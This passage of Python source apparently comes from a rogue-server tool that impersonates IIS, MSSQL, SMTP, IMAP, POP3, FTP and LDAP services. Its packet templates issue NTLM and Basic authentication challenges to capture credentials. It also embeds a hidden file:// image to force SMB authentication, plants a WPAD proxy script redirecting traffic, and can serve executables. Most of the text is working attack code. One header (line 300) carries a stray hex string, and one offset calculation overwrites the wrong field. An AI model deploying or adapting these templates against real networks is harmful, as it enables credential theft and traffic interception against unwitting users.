 259 |         ("Code",          "HTTP/1.1 200 OK\r\n"),
 260 |         ("ServerType",    "Server: Microsoft-IIS/6.0\r\n"),
 261 |         ("Date",          "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
 262 |         ("Type",          "Content-Type: image/x-icon\r\n"),
 263 |         ("WWW-Auth",      "WWW-Authenticate: NTLM\r\n"),
 264 |         ("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
 265 |         ("ContentLen",    "Content-Length: "),
 266 |         ("ActualLen",     "76"),
 267 |         ("CRLF",          "\r\n\r\n"),
 268 |         ("Payload",       "<html>\n<head>\n</head>\n<body>\n<img src='file:\\\\\\\\\\\\shar\\smileyd.ico' alt='Loading' height='1' width='2'>\n</body>\n</html>\n"),
 269 |     ])
 270 |     def calculate(self):
 271 |         self.fields["ActualLen"] = len(self.fields["Payload"])
 272 | 
 273 | class IIS_RDP(Packet):
 274 |     fields = OrderedDict([
 275 |         ("Code",          "HTTP/1.1 200 OK\r\n"),
 276 |         ("ServerType",    "Server: Microsoft-IIS/6.0\r\n"),
 277 |         ("Date",          "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
 278 |         ("Type",          "Content-Type: application/rdp\r\n"),
 279 |         ("WWW-Auth",      "WWW-Authenticate: NTLM\r\n"),
 280 |         ("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
 281 |         ("ContentLen",    "Content-Length: "),
 282 |         ("ActualLen",     "76"),
 283 |         ("CRLF",          "\r\n\r\n"),
 284 |         ("Payload",       "<html>\n<head>\n</head>\n<body>\n<img src='file:\\\\\\\\\\\\shar\\smileyd.ico' alt='Loading' height='1' width='2'>\n</body>\n</html>\n"),
 285 |     ])
 286 |     def calculate(self):
 287 |         self.fields["ActualLen"] = len(str(self.fields["Payload"]))
 288 | 
 289 | 
 290 | 
 291 | class IIS_NTLM_Challenge_Ans(Packet):
 292 |     fields = OrderedDict([
 293 |         ("Code",          "HTTP/1.1 401 Unauthorized\r\n"),
 294 |         ("ServerType",    "Server: Microsoft-IIS/6.0\r\n"),
 295 |         ("Date",          "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
 296 |         ("Type",          "Content-Type: text/html\r\n"),
 297 |         ("WWWAuth",       "WWW-Authenticate: NTLM "),
 298 |         ("Payload",       ""),
 299 |         ("Payload-CRLF",  "\r\n"),
 300 |         ("PoweredBy",     "X-Powered-By: ASP.NC0CD7B7802C76736E9B26FB19BEB2D36290B9FF9A46EDDA5ET\r\n"),
 301 |         ("Len",           "Content-Length: 0\r\n"),
 302 |         ("ConnClose",     "Connection: close\r\n"),
 303 |         ("CRLF",          "\r\n"),
 304 |     ])
 305 | 
 306 |     def calculate(self,payload):
 307 |         self.fields["Payload"] = b64encode(payload)
 308 | 
 309 | class IIS_Basic_401_Ans(Packet):
 310 |     fields = OrderedDict([
 311 |         ("Code",          "HTTP/1.1 401 Unauthorized\r\n"),
 312 |         ("ServerType",    "Server: Microsoft-IIS/6.0\r\n"),
 313 |         ("Date",          "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
 314 |         ("Type",          "Content-Type: text/html\r\n"),
 315 |         ("WWW-Auth",      "WWW-Authenticate: Basic realm=\"Authentication Required\"\r\n"),
 316 |         ("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
 317 |         ("AllowOrigin",   "Access-Control-Allow-Origin: *\r\n"),
 318 |         ("AllowCreds",    "Access-Control-Allow-Credentials: true\r\n"),
 319 |         ("Len",           "Content-Length: 0\r\n"),
 320 |         ("CRLF",          "\r\n"),
 321 |     ])
 322 | 
 323 | ##### Proxy mode Packets #####
 324 | class WPADScript(Packet):
 325 |     fields = OrderedDict([
 326 |         ("Code",          "HTTP/1.1 200 OK\r\n"),
 327 |         ("ServerTlype",    "Server: Microsoft-IIS/6.0\r\n"),
 328 |         ("Date",          "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
 329 |         ("Type",          "Content-Type: application/x-ns-proxy-autoconfig\r\n"),
 330 |         ("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
 331 |         ("ContentLen",    "Content-Length: "),
 332 |         ("ActualLen",     "76"),
 333 |         ("CRLF",          "\r\n\r\n"),
 334 |         ("Payload",       "function FindProxyForURL(url, host){return 'PROXY wpadwpadwpad:3141; DIRECT';}"),
 335 |     ])
 336 |     def calculate(self):
 337 |         self.fields["ActualLen"] = len(str(self.fields["Payload"]))
 338 | 
 339 | class ServeExeFile(Packet):
 340 |     fields = OrderedDict([
 341 |         ("Code",          "HTTP/1.1 200 OK\r\n"),
 342 |         ("ContentType",   "Content-Type: application/octet-stream\r\n"),
 343 |         ("LastModified",  "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"),
 344 |         ("AcceptRanges",  "Accept-Ranges: bytes\r\n"),
 345 |         ("Server",        "Server: Microsoft-IIS/7.5\r\n"),
 346 |         ("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
 347 |         ("ContentDisp",   "Content-Disposition: attachment; filename="),
 348 |         ("ContentDiFile", ""),
 349 |         ("FileCRLF",      ";\r\n"),
 350 |         ("ContentLen",    "Content-Length: "),
 351 |         ("ActualLen",     "76"),
 352 |         ("Date",          "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"),
 353 |         ("Connection",    "Connection: keep-alive\r\n"),
 354 |         ("X-CCC",         "US\r\n"),
 355 |         ("X-CID",         "2\r\n"),
 356 |         ("CRLF",          "\r\n"),
 357 |         ("Payload",       "jj"),
 358 |     ])
 359 |     def calculate(self):
 360 |         self.fields["ActualLen"] = len(str(self.fields["Payload"]))
 361 | 
 362 | class ServeHtmlFile(Packet):
 363 |     fields = OrderedDict([
 364 |         ("Code",          "HTTP/1.1 200 OK\r\n"),
 365 |         ("ContentType",   "Content-Type: text/html\r\n"),
 366 |         ("LastModified",  "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"),
 367 |         ("AcceptRanges",  "Accept-Ranges: bytes\r\n"),
 368 |         ("Server",        "Server: Microsoft-IIS/7.5\r\n"),
 369 |         ("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
 370 |         ("ContentLen",    "Content-Length: "),
 371 |         ("ActualLen",     "76"),
 372 |         ("Date",          "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"),
 373 |         ("Connection",    "Connection: keep-alive\r\n"),
 374 |         ("CRLF",          "\r\n"),
 375 |         ("Payload",       "jj"),
 376 |     ])
 377 |     def calculate(self):
 378 |         self.fields["ActualLen"] = len(str(self.fields["Payload"]))
 379 | 
 380 | ##### FTP Packets #####
 381 | class FTPPacket(Packet):
 382 |     fields = OrderedDict([
 383 |         ("Code",           "220"),
 384 |         ("Separator",      "\x20"),
 385 |         ("Message",        "Welcome"),
 386 |         ("Terminator",     "\x0d\x0a"),
 387 |     ])
 388 | 
 389 | ##### SQL Packets #####
 390 | class MSSQLPreLoginAnswer(Packet):
 391 |     fields = OrderedDict([
 392 |         ("PacketType",       "\x04"),
 393 |         ("Status",           "\x01"),
 394 |         ("Len",              "\x00\x25"),
 395 |         ("SPID",             "\x00\x00"),
 396 |         ("PacketID",         "\x01"),
 397 |         ("Window",           "\x00"),
 398 |         ("TokenType",        "\x00"),
 399 |         ("VersionOffset",    "\x00\x15"),
 400 |         ("VersionLen",       "\x00\x06"),
 401 |         ("TokenType1",       "\x01"),
 402 |         ("EncryptionOffset", "\x00\x1b"),
 403 |         ("EncryptionLen",    "\x00\x01"),
 404 |         ("TokenType2",       "\x02"),
 405 |         ("InstOptOffset",    "\x00\x1c"),
 406 |         ("InstOptLen",       "\x00\x01"),
 407 |         ("TokenTypeThrdID",  "\x03"),
 408 |         ("ThrdIDOffset",     "\x00\x1d"),
 409 |         ("ThrdIDLen",        "\x00\x00"),
 410 |         ("ThrdIDTerminator", "\xff"),
 411 |         ("VersionStr",       "\x09\x00\x0f\xc3"),
 412 |         ("SubBuild",         "\x00\x00"),
 413 |         ("EncryptionStr",    "\x02"),
 414 |         ("InstOptStr",       "\x00"),
 415 |     ])
 416 | 
 417 |     def calculate(self):
 418 |         CalculateCompletePacket = str(self.fields["PacketType"])+str(self.fields["Status"])+str(self.fields["Len"])+str(self.fields["SPID"])+str(self.fields["PacketID"])+str(self.fields["Window"])+str(self.fields["TokenType"])+str(self.fields["VersionOffset"])+str(self.fields["VersionLen"])+str(self.fields["TokenType1"])+str(self.fields["EncryptionOffset"])+str(self.fields["EncryptionLen"])+str(self.fields["TokenType2"])+str(self.fields["InstOptOffset"])+str(self.fields["InstOptLen"])+str(self.fields["TokenTypeThrdID"])+str(self.fields["ThrdIDOffset"])+str(self.fields["ThrdIDLen"])+str(self.fields["ThrdIDTerminator"])+str(self.fields["VersionStr"])+str(self.fields["SubBuild"])+str(self.fields["EncryptionStr"])+str(self.fields["InstOptStr"])
 419 |         VersionOffset = str(self.fields["TokenType"])+str(self.fields["VersionOffset"])+str(self.fields["VersionLen"])+str(self.fields["TokenType1"])+str(self.fields["EncryptionOffset"])+str(self.fields["EncryptionLen"])+str(self.fields["TokenType2"])+str(self.fields["InstOptOffset"])+str(self.fields["InstOptLen"])+str(self.fields["TokenTypeThrdID"])+str(self.fields["ThrdIDOffset"])+str(self.fields["ThrdIDLen"])+str(self.fields["ThrdIDTerminator"])
 420 |         EncryptionOffset = VersionOffset+str(self.fields["VersionStr"])+str(self.fields["SubBuild"])
 421 |         InstOpOffset = EncryptionOffset+str(self.fields["EncryptionStr"])
 422 |         ThrdIDOffset = InstOpOffset+str(self.fields["InstOptStr"])
 423 | 
 424 |         self.fields["Len"] = struct.pack(">h",len(CalculateCompletePacket))
 425 |         #Version
 426 |         self.fields["VersionLen"] = struct.pack(">h",len(self.fields["VersionStr"]+self.fields["SubBuild"]))
 427 |         self.fields["VersionOffset"] = struct.pack(">h",len(VersionOffset))
 428 |         #Encryption
 429 |         self.fields["EncryptionLen"] = struct.pack(">h",len(self.fields["EncryptionStr"]))
 430 |         self.fields["EncryptionOffset"] = struct.pack(">h",len(EncryptionOffset))
 431 |         #InstOpt
 432 |         self.fields["InstOptLen"] = struct.pack(">h",len(self.fields["InstOptStr"]))
 433 |         self.fields["EncryptionOffset"] = struct.pack(">h",len(InstOpOffset))
 434 |         #ThrdIDOffset
 435 |         self.fields["ThrdIDOffset"] = struct.pack(">h",len(ThrdIDOffset))
 436 | 
 437 | class MSSQLNTLMChallengeAnswer(Packet):
 438 |     fields = OrderedDict([
 439 |         ("PacketType",       "\x04"),
 440 |         ("Status",           "\x01"),
 441 |         ("Len",              "\x00\xc7"),
 442 |         ("SPID",             "\x00\x00"),
 443 |         ("PacketID",         "\x01"),
 444 |         ("Window",           "\x00"),
 445 |         ("TokenType",        "\xed"),
 446 |         ("SSPIBuffLen",      "\xbc\x00"),
 447 |         ("Signature",        "NTLMSSP"),
 448 |         ("SignatureNull",    "\x00"),
 449 |         ("MessageType",      "\x02\x00\x00\x00"),
 450 |         ("TargetNameLen",    "\x06\x00"),
 451 |         ("TargetNameMaxLen", "\x06\x00"),
 452 |         ("TargetNameOffset", "\x38\x00\x00\x00"),
 453 |         ("NegoFlags",        "\x05\x02\x89\xa2"),
 454 |         ("ServerChallenge",  ""),
 455 |         ("Reserved",         "\x00\x00\x00\x00\x00\x00\x00\x00"),
 456 |         ("TargetInfoLen",    "\x7e\x00"),
 457 |         ("TargetInfoMaxLen", "\x7e\x00"),
 458 |         ("TargetInfoOffset", "\x3e\x00\x00\x00"),
 459 |         ("NTLMOsVersion",    "\x05\x02\xce\x0e\x00\x00\x00\x0f"),
 460 |         ("TargetNameStr",    "SMB"),
 461 |         ("Av1",              "\x02\x00"),#nbt name
 462 |         ("Av1Len",           "\x06\x00"),
 463 |         ("Av1Str",           "SMB"),
 464 |         ("Av2",              "\x01\x00"),#Server name
 465 |         ("Av2Len",           "\x14\x00"),
 466 |         ("Av2Str",           "SMB-TOOLKIT"),
 467 |         ("Av3",              "\x04\x00"),#Full Domain name
 468 |         ("Av3Len",           "\x12\x00"),
 469 |         ("Av3Str",           "smb.local"),
 470 |         ("Av4",              "\x03\x00"),#Full machine domain name
 471 |         ("Av4Len",           "\x28\x00"),
 472 |         ("Av4Str",           "server2003.smb.local"),
 473 |         ("Av5",              "\x05\x00"),#Domain Forest Name
 474 |         ("Av5Len",           "\x12\x00"),
 475 |         ("Av5Str",           "smb.local"),
 476 |         ("Av6",              "\x00\x00"),#AvPairs Terminator
 477 |         ("Av6Len",           "\x00\x00"),
 478 |     ])
 479 | 
 480 |     def calculate(self):
 481 |         # First convert to unicode
 482 |         self.fields["TargetNameStr"] = self.fields["TargetNameStr"].encode('utf-16le')
 483 |         self.fields["Av1Str"] = self.fields["Av1Str"].encode('utf-16le')
 484 |         self.fields["Av2Str"] = self.fields["Av2Str"].encode('utf-16le')
 485 |         self.fields["Av3Str"] = self.fields["Av3Str"].encode('utf-16le')
 486 |         self.fields["Av4Str"] = self.fields["Av4Str"].encode('utf-16le')
 487 |         self.fields["Av5Str"] = self.fields["Av5Str"].encode('utf-16le')
 488 | 
 489 |         # Then calculate
 490 |         CalculateCompletePacket = str(self.fields["PacketType"])+str(self.fields["Status"])+str(self.fields["Len"])+str(self.fields["SPID"])+str(self.fields["PacketID"])+str(self.fields["Window"])+str(self.fields["TokenType"])+str(self.fields["SSPIBuffLen"])+str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])+str(self.fields["TargetNameStr"])+str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"])
 491 |         CalculateSSPI = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])+str(self.fields["TargetNameStr"])+str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"])
 492 |         CalculateNameOffset = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])
 493 |         CalculateAvPairsOffset = CalculateNameOffset+str(self.fields["TargetNameStr"])
 494 |         CalculateAvPairsLen = str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"])
 495 | 
 496 |         self.fields["Len"] = struct.pack(">h",len(CalculateCompletePacket))
 497 |         self.fields["SSPIBuffLen"] = struct.pack("<i",len(CalculateSSPI))[:2]
 498 |         # Target Name Offsets
 499 |         self.fields["TargetNameOffset"] = struct.pack("<i", len(CalculateNameOffset))
 500 |         self.fields["TargetNameLen"] = struct.pack("<i", len(self.fields["TargetNameStr"]))[:2]
 501 |         self.fields["TargetNameMaxLen"] = struct.pack("<i", len(self.fields["TargetNameStr"]))[:2]
 502 |         # AvPairs Offsets
 503 |         self.fields["TargetInfoOffset"] = struct.pack("<i", len(CalculateAvPairsOffset))
 504 |         self.fields["TargetInfoLen"] = struct.pack("<i", len(CalculateAvPairsLen))[:2]
 505 |         self.fields["TargetInfoMaxLen"] = struct.pack("<i", len(CalculateAvPairsLen))[:2]
 506 |         # AvPairs StrLen
 507 |         self.fields["Av1Len"] = struct.pack("<i", len(str(self.fields["Av1Str"])))[:2]
 508 |         self.fields["Av2Len"] = struct.pack("<i", len(str(self.fields["Av2Str"])))[:2]
 509 |         self.fields["Av3Len"] = struct.pack("<i", len(str(self.fields["Av3Str"])))[:2]
 510 |         self.fields["Av4Len"] = struct.pack("<i", len(str(self.fields["Av4Str"])))[:2]
 511 |         self.fields["Av5Len"] = struct.pack("<i", len(str(self.fields["Av5Str"])))[:2]
 512 | 
 513 | ##### SMTP Packets #####
 514 | class SMTPGreeting(Packet):
 515 |     fields = OrderedDict([
 516 |         ("Code",       "220"),
 517 |         ("Separator",  "\x20"),
 518 |         ("Message",    "smtp01.local ESMTP"),
 519 |         ("CRLF",       "\x0d\x0a"),
 520 |     ])
 521 | 
 522 | class SMTPAUTH(Packet):
 523 |     fields = OrderedDict([
 524 |         ("Code0",      "250"),
 525 |         ("Separator0", "\x2d"),
 526 |         ("Message0",   "smtp01.local"),
 527 |         ("CRLF0",      "\x0d\x0a"),
 528 |         ("Code",       "250"),
 529 |         ("Separator",  "\x20"),
 530 |         ("Message",    "AUTH LOGIN PLAIN XYMCOOKIE"),
 531 |         ("CRLF",       "\x0d\x0a"),
 532 |     ])
 533 | 
 534 | class SMTPAUTH1(Packet):
 535 |     fields = OrderedDict([
 536 |         ("Code",       "334"),
 537 |         ("Separator",  "\x20"),
 538 |         ("Message",    "VXNlcm5hbWU6"),#Username
 539 |         ("CRLF",       "\x0d\x0a"),
 540 | 
 541 |     ])
 542 | 
 543 | class SMTPAUTH2(Packet):
 544 |     fields = OrderedDict([
 545 |         ("Code",       "334"),
 546 |         ("Separator",  "\x20"),
 547 |         ("Message",    "UGFzc3dvcmQ6"),#Password
 548 |         ("CRLF",       "\x0d\x0a"),
 549 |     ])
 550 | 
 551 | ##### IMAP Packets #####
 552 | class IMAPGreeting(Packet):
 553 |     fields = OrderedDict([
 554 |         ("Code",     "* OK IMAP4 service is ready."),
 555 |         ("CRLF",     "\r\n"),
 556 |     ])
 557 | 
 558 | class IMAPCapability(Packet):
 559 |     fields = OrderedDict([
 560 |         ("Code",     "* CAPABILITY IMAP4 IMAP4rev1 AUTH=PLAIN"),
 561 |         ("CRLF",     "\r\n"),
 562 |     ])
 563 | 
 564 | class IMAPCapabilityEnd(Packet):
 565 |     fields = OrderedDict([
 566 |         ("Tag",     ""),
 567 |         ("Message", " OK CAPABILITY completed."),
 568 |         ("CRLF",    "\r\n"),
 569 |     ])
 570 | 
 571 | ##### POP3 Packets #####
 572 | class POPOKPacket(Packet):
 573 |     fields = OrderedDict([
 574 |         ("Code",  "+OK"),
 575 |         ("CRLF",  "\r\n"),
 576 |     ])
 577 | 
 578 | ##### LDAP Packets #####
 579 | class LDAPSearchDefaultPacket(Packet):
 580 |     fields = OrderedDict([
 581 |         ("ParserHeadASNID",          "\x30"),
 582 |         ("ParserHeadASNLen",         "\x0c"),
 583 |         ("MessageIDASNID",           "\x02"),
 584 |         ("MessageIDASNLen",          "\x01"),
 585 |         ("MessageIDASNStr",          "\x0f"),
 586 |         ("OpHeadASNID",              "\x65"),
 587 |         ("OpHeadASNIDLen",           "\x07"),
 588 |         ("SearchDoneSuccess",        "\x0A\x01\x00\x04\x00\x04\x00"),#No Results.
 589 |     ])
 590 | 
 591 | class LDAPSearchSupportedCapabilitiesPacket(Packet):
 592 |     fields = OrderedDict([
 593 |         ("ParserHeadASNID",          "\x30"),
 594 |         ("ParserHeadASNLenOfLen",    "\x84"),
 595 |         ("ParserHeadASNLen",         "\x00\x00\x00\x7e"),#126
 596 |         ("MessageIDASNID",           "\x02"),
 597 |         ("MessageIDASNLen",          "\x01"),
 598 |         ("MessageIDASNStr",          "\x02"),
 599 |         ("OpHeadASNID",              "\x64"),
 600 |         ("OpHeadASNIDLenOfLen",      "\x84"),
 601 |         ("OpHeadASNIDLen",           "\x00\x00\x00\x75"),#117
 602 |         ("ObjectName",               "\x04\x00"),
 603 |         ("SearchAttribASNID",        "\x30"),
 604 |         ("SearchAttribASNLenOfLen",  "\x84"),
 605 |         ("SearchAttribASNLen",       "\x00\x00\x00\x6d"),#109
 606 |         ("SearchAttribASNID1",       "\x30"),
 607 |         ("SearchAttribASN1LenOfLen", "\x84"),
 608 |         ("SearchAttribASN1Len",      "\x00\x00\x00\x67"),#103
 609 |         ("SearchAttribASN2ID",       "\x04"),
 610 |         ("SearchAttribASN2Len",      "\x15"),#21
 611 |         ("SearchAttribASN2Str",      "supportedCapabilities"),
 612 |         ("SearchAttribASN3ID",       "\x31"),
 613 |         ("SearchAttribASN3LenOfLen", "\x84"),
 614 |         ("SearchAttribASN3Len",      "\x00\x00\x00\x4a"),
 615 |         ("SearchAttrib1ASNID",       "\x04"),
 616 |         ("SearchAttrib1ASNLen",      "\x16"),#22
 617 |         ("SearchAttrib1ASNStr",      "1.2.840.113556.1.4.800"),
 618 |         ("SearchAttrib2ASNID",       "\x04"),
 619 |         ("SearchAttrib2ASNLen",      "\x17"),#23
 620 |         ("SearchAttrib2ASNStr",      "1.2.840.113556.1.4.1670"),
 621 |         ("SearchAttrib3ASNID",       "\x04"),
 622 |         ("SearchAttrib3ASNLen",      "\x17"),#23
 623 |         ("SearchAttrib3ASNStr",      "1.2.840.113556.1.4.1791"),
 624 |         ("SearchDoneASNID",          "\x30"),
 625 |         ("SearchDoneASNLenOfLen",    "\x84"),
 626 |         ("SearchDoneASNLen",         "\x00\x00\x00\x10"),#16
 627 |         ("MessageIDASN2ID",          "\x02"),
 628 |         ("MessageIDASN2Len",         "\x01"),
 629 |         ("MessageIDASN2Str",         "\x02"),
 630 |         ("SearchDoneStr",            "\x65\x84\x00\x00\x00\x07\x0a\x01\x00\x04\x00\x04\x00"),
 631 |         ## No need to calculate anything this time, this packet is generic.
 632 |     ])
 633 | 
 634 | class LDAPSearchSupportedMechanismsPacket(Packet):
 635 |     fields = OrderedDict([
 636 |         ("ParserHeadASNID",          "\x30"),
 637 |         ("ParserHeadASNLenOfLen",    "\x84"),
 638 |         ("ParserHeadASNLen",         "\x00\x00\x00\x60"),#96
 639 |         ("MessageIDASNID",           "\x02"),
 640 |         ("MessageIDASNLen",          "\x01"),
 641 |         ("MessageIDASNStr",          "\x02"),
 642 |         ("OpHeadASNID",              "\x64"),
 643 |         ("OpHeadASNIDLenOfLen",      "\x84"),
 644 |         ("OpHeadASNIDLen",           "\x00\x00\x00\x57"),#87
 645 |         ("ObjectName",               "\x04\x00"),
 646 |         ("SearchAttribASNID",        "\x30"),
 647 |         ("SearchAttribASNLenOfLen",  "\x84"),
 648 |         ("SearchAttribASNLen",       "\x00\x00\x00\x4f"),#79
 649 |         ("SearchAttribASNID1",       "\x30"),
 650 |         ("SearchAttribASN1LenOfLen", "\x84"),
 651 |         ("SearchAttribASN1Len",      "\x00\x00\x00\x49"),#73
 652 |         ("SearchAttribASN2ID",       "\x04"),
 653 |         ("SearchAttribASN2Len",      "\x17"),#23
 654 |         ("SearchAttribASN2Str",      "supportedSASLMechanisms"),
 655 |         ("SearchAttribASN3ID",       "\x31"),
 656 |         ("SearchAttribASN3LenOfLen", "\x84"),
 657 |         ("SearchAttribASN3Len",      "\x00\x00\x00\x2a"),#42
 658 |         ("SearchAttrib1ASNID",       "\x04"),
 659 |         ("SearchAttrib1ASNLen",      "\x06"),#6
 660 |         ("SearchAttrib1ASNStr",      "GSSAPI"),
 661 |         ("SearchAttrib2ASNID",       "\x04"),
 662 |         ("SearchAttrib2ASNLen",      "\x0a"),#10
 663 |         ("SearchAttrib2ASNStr",      "GSS-SPNEGO"),
 664 |         ("SearchAttrib3ASNID",       "\x04"),
 665 |         ("SearchAttrib3ASNLen",      "\x08"),#8
 666 |         ("SearchAttrib3ASNStr",      "EXTERNAL"),
 667 |         ("SearchAttrib4ASNID",       "\x04"),
 668 |         ("SearchAttrib4ASNLen",      "\x0a"),#10
 669 |         ("SearchAttrib4ASNStr",      "DIGEST-MD5"),
 670 |         ("SearchDoneASNID",          "\x30"),
 671 |         ("SearchDoneASNLenOfLen",    "\x84"),
 672 |         ("SearchDoneASNLen",         "\x00\x00\x00\x10"),#16
 673 |         ("MessageIDASN2ID",          "\x02"),
 674 |         ("MessageIDASN2Len",         "\x01"),
 675 |         ("MessageIDASN2Str",         "\x02"),
 676 |         ("SearchDoneStr",            "\x65\x84\x00\x00\x00\x07\x0a\x01\x00\x04\x00\x04\x00"),
 677 |         ## No need to calculate anything this time, this packet is generic.
 678 |     ])
 679 | 
 680 | class LDAPNTLMChallenge(Packet):
 681 |     fields = OrderedDict([
 682 |         ("ParserHeadASNID",                           "\x30"),
 683 |         ("ParserHeadASNLenOfLen",                     "\x84"),
 684 |         ("ParserHeadASNLen",                          "\x00\x00\x00\xD0"),#208
 685 |         ("MessageIDASNID",                            "\x02"),
 686 |         ("MessageIDASNLen",                           "\x01"),
 687 |         ("MessageIDASNStr",                           "\x02"),
 688 |         ("OpHeadASNID",                               "\x61"),
 689 |         ("OpHeadASNIDLenOfLen",                       "\x84"),
 690 |         ("OpHeadASNIDLen",                            "\x00\x00\x00\xc7"),#199
 691 |         ("Status",                                    "\x0A"),
 692 |         ("StatusASNLen",                              "\x01"),
 693 |         ("StatusASNStr",                              "\x0e"), #In Progress.
 694 |         ("MatchedDN",                                 "\x04\x00"), #Null
 695 |         ("ErrorMessage",                              "\x04\x00"), #Null
 696 |         ("SequenceHeader",                            "\x87"),
 697 |         ("SequenceHeaderLenOfLen",                    "\x81"),
 698 |         ("SequenceHeaderLen",                         "\x82"), #188
 699 |         ("NTLMSSPSignature",                          "NTLMSSP"),
 700 |         ("NTLMSSPSignatureNull",                      "\x00"),
 701 |         ("NTLMSSPMessageType",                        "\x02\x00\x00\x00"),
 702 |         ("NTLMSSPNtWorkstationLen",                   "\x1e\x00"),
 703 |         ("NTLMSSPNtWorkstationMaxLen",                "\x1e\x00"),
 704 |         ("NTLMSSPNtWorkstationBuffOffset",            "\x38\x00\x00\x00"),
 705 |         ("NTLMSSPNtNegotiateFlags",                   "\x15\x82\x89\xe2"),
 706 |         ("NTLMSSPNtServerChallenge",                  "\x81\x22\x33\x34\x55\x46\xe7\x88"),
 707 |         ("NTLMSSPNtReserved",                         "\x00\x00\x00\x00\x00\x00\x00\x00"),
 708 |         ("NTLMSSPNtTargetInfoLen",                    "\x94\x00"),
 709 |         ("NTLMSSPNtTargetInfoMaxLen",                 "\x94\x00"),
 710 |         ("NTLMSSPNtTargetInfoBuffOffset",             "\x56\x00\x00\x00"),
 711 |         ("NegTokenInitSeqMechMessageVersionHigh",     "\x05"),
 712 |         ("NegTokenInitSeqMechMessageVersionLow",      "\x02"),
 713 |         ("NegTokenInitSeqMechMessageVersionBuilt",    "\xce\x0e"),
 714 |         ("NegTokenInitSeqMechMessageVersionReserved", "\x00\x00\x00"),
 715 |         ("NegTokenInitSeqMechMessageVersionNTLMType", "\x0f"),
 716 |         ("NTLMSSPNtWorkstationName",                  "SMB12"),
 717 |         ("NTLMSSPNTLMChallengeAVPairsId",             "\x02\x00"),
 718 |         ("NTLMSSPNTLMChallengeAVPairsLen",            "\x0a\x00"),
 719 |         ("NTLMSSPNTLMChallengeAVPairsUnicodeStr",     "smb12"),
 720 |         ("NTLMSSPNTLMChallengeAVPairs1Id",            "\x01\x00"),
 721 |         ("NTLMSSPNTLMChallengeAVPairs1Len",           "\x1e\x00"),
 722 |         ("NTLMSSPNTLMChallengeAVPairs1UnicodeStr",    "SERVER2008"),
 723 |         ("NTLMSSPNTLMChallengeAVPairs2Id",            "\x04\x00"),
 724 |         ("NTLMSSPNTLMChallengeAVPairs2Len",           "\x1e\x00"),
 725 |         ("NTLMSSPNTLMChallengeAVPairs2UnicodeStr",    "smb12.local"),
 726 |         ("NTLMSSPNTLMChallengeAVPairs3Id",            "\x03\x00"),
 727 |         ("NTLMSSPNTLMChallengeAVPairs3Len",           "\x1e\x00"),
 728 |         ("NTLMSSPNTLMChallengeAVPairs3UnicodeStr",    "SERVER2008.smb12.local"),
 729 |         ("NTLMSSPNTLMChallengeAVPairs5Id",            "\x05\x00"),
 730 |         ("NTLMSSPNTLMChallengeAVPairs5Len",           "\x04\x00"),
 731 |         ("NTLMSSPNTLMChallengeAVPairs5UnicodeStr",    "smb12.local"),
 732 |         ("NTLMSSPNTLMChallengeAVPairs6Id",            "\x00\x00"),
 733 |         ("NTLMSSPNTLMChallengeAVPairs6Len",           "\x00\x00"),
 734 |     ])
 735 | 
